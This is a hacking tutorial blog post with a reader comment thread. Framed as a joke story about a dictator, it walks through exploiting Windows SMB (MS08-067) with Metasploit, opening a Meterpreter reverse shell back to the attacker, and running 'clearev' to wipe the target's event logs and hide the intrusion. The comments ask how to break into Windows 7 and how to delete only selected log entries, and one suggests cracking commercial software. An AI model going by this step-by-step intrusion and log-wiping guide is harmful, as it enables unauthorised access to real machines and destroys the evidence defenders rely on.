Welcome back, my greenhorn hackers!
Congratulations on your successful hack that saved the world from nuclear annihilation from our little, bellicose, Twinkie-eating dictator. The rest of world may not know what you did, but I do. Good job!
Now that we hacked into the malevolent dictator's computer and temporarily disabled his nuclear launch capability, we have to think about covering our tracks so that he and his minions can't track our good works back to us.
So, in this hack, we will go into his computer again, implant the Meterpreter and remove any trace that we had been there from his log files. Let's fire up Metasploit and get to work on removing any evidence that we had ever been on the dictator's computer.
Step 1: Compromise His System Again
Let's start with the same hack we used to get into the dictator's computer initially:
exploit/windows/smb/ms08_067_netapi
But instead of using the VNC payload, we will load the Meterpreter payload. Type:
- msf> use exploit/windows/smb/ms08_067_netapi
Before we move on, let's learn a bit more about this exploit. Type:
- msf exploit(ms08_067_netapi) info
This should bring a screenshot below that provides us with some basic information about this exploit. We can see that this hack exploits a parsing flaw in the netapi dll. In this way, we can place our own payload on the system, which in this case is the Meterpreter.
Now we load the payload by typing:
- msf exploit(ms08_067_netapi) set PAYLOAD windows/meterpreter/reverse_tcp
Now that we have the exploit and payload set, we need to set the options. In this case, we need to set our LHOST (us, the attacker) and the RHOST (the victim, our belligerent dictator's computer) IP addresses. Simply type in the IP address of your computer and of his computer.
Step 2: Take Control of His Computer
Now that we have everything set to take control, we just type:
- msf exploit(ms08_067_netapi) exploit
If we are successful, we should see a Meterpreter prompt on our screen. We now have total control of his system!
At the meterpreter prompt, we now type:
- meterpreter > clearev
As you can see in the screenshot above, this command proceeds to clear the event logs on our bellicose dictator's computer so that he and his minions have no clue that we've ever been there. If we could see the event logs on his computer, we will see that all events have been cleared.
This is critical both to protect our being found out, but also that we continue to have access to his computer. Once they know that someone has hacked his computer, it's likely they will take measures to prevent our returning to it.
Now, make sure to come back for more hacking fun and games on our dictator's computer!
Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:
49 Comments
What is backrack5? I always see it up when you use Metasploit. Do we need it?
Hi Ben:
Back Track 5 is a Linux distribution with hundreds of hacking and security tools. No, you don't need it, but I recommend it.
OTW
Hi, I know this does not have to do with this article, but i have been wondering this. When I download Metasploit, it asks for the port, days of validity, and server name, what does this mean for my router? Will it cost extra? Will it show up as a opened port on the router? Sorry if this sounds newbie, I am new to this, and I would like help so I can get better.
Ben:
Are you downloading it to Windows? Or are you downloading Armitage?
You are better off just installing Back Track, but you will need to know a bit of Linux.
OTW
Oh, sorry. I'm using Windows 7.
are u really hacking onto the dictators comp,or is it a joke
Aditya:
We really hacked into the dictator's computer and saved the world ;-)
loooool
k
hey I would like to use Backtrack on MaC thats possible ?
everything is possible with VMware OR VirtualBox!
I recommend VMware (you can just crack it...)
:-)
hi sir hope you are fine:-
after writing the exploit command it give me this error
exploit exceptions: no matching target
it means there is no computer with that ip..
You must do that :
set lport 4444
set lhost (there you put your target's IP)
Wajid:
It looks like you are attacking a Win 7 machine. Is that correct?
OTW
yes::what is wrong with that do you know any solution for that????
Wijid:
This attack is not for Windows 7. It only works for for XP, 2003, Vista and some 2008.
OTW
so can you show me how to hack windows 7 enterprise 32bit ,and windows 8???
can I hack windows 7 if yes then How????
are you there sir?????? I am waiting for your comment
Wajid:
The there are a number of different ways to hack Win 7, but they usually involve hacking one of the client side applications like the browser, Office or a PDF. I have a few tutorials on doing each of these on Null Byte. In addition, there is brand new hack of Win 7 that is out that I will put up soon.
OTW
then I should wait right?????
one more thing can you show how to install tightvnc on backtrack 5
hey these works only in virtual machine it doesn't work in 2 computer
If this is that easy, then why the most sophisticated hackers get caught?
Wajid:
Yes, you should wait or look at my tutorials on PDF or Word docs.
These work on either virtual machine or physical machine.
This just shows you a few techniques of covering your tracks. There are more that I will write about in the future. BTW, most sophisticated hackers do NOT get caught. It's the script kiddies that get caught.
OTW
Hi sir! Hope you are fine and enjoying a good health???
my question is that I can't find some of options in backtrack 5, currently I don't know are they missing from backtrack 5 or I must download it, some of the missing files like wordlist.lst, wifi-honey, fern-wifi-cracker, host, pyrift, reaver, wifite or etc....
I upgrade and update backtrack 5 r3 as will but nothing happens.
could you give a little bit instruction about it please???
Thanks
Wajid:
Try using the "locate" command to find those apps and files.
OTW
you mean by ctrl+f or search right
the search option didn't find it as will
Wajid:
I meant using the locate command in Linux. For example"
bt> locate reaver
OTW
please sir, am new to your forum, please how can i get the link to this previous tutorial
Horls:
What previous tutorial are you looking for?
OTW
this tutorial is about covering tracks then am asking of the tutorial where the attack was performed also will glad if you can help ,e with tutorial on how to attack win7 computer or higher
Horls:
I have numerous attack tutorials, but this one is from here .
OTW
thank you sir
Sir OTW
Will meterpreter still work as it should even if i use VPN to somehow disguise my real IP?
yes
I really wish someone would do these tutorials using a windows computer. i realize its the hackers choice to use linux and backtrack but unfortunately not all of us have it. also you can't even use Metasploit unless you have a minimum of 16gb on your computer. Not very many people have that type of RAM and even fewer realize that is the requirement.
I'm impressed with your patience , OTW!
Will this hack only work if port 445 is open? When I used nmap to scan to see if it was open, it didn't say open or closed it said filtered, I've read a lot of your tutorials but you have never mentioned (to my knowledge) what the filtered status means. Can you use a hack over a "filtered" port? Any response would be appreciated.
Turkey:
Port 445 must be open, but that is usually not a problem as nearly every Windows machine has port 445 open (SMB). Filtering mean sthat there is likely a firewall between you and the target.
OTW
Thank you for clarifying
Read a comment farther up-
SniperCatz said you need a minimum of "16 gb" on your computer to run metasploit.
Did they mean 16gb of ram or 16gb of hard-disk space?
Neither. Some people's comments are simply inaccurate.
Okay, thankyou!
I agree. SniperCatz is wrong.
FYI. Ninja He was saying RAM "Not very many people have that type of RAM"
Ah woops, I missed that.
Metasploit takes less a 1gb of hard drive space and although Rapid7 lists 2gb as a minimum of RAM, I would recommend 4gb or more.
Is there any way to hack windows 7 remotely ??
how to delete logs specific to our hack instead off deleting full log file?
i know it's possible. i read article long ago, one hacker tried to cover his track with deleting logs specific to his hack, but unfortunately he accidently deleted some important backup logs. and get caught
What is the dictators IP address or is it just your computer.
And if so can I hack it as long as I don't break it?
Share Your Thoughts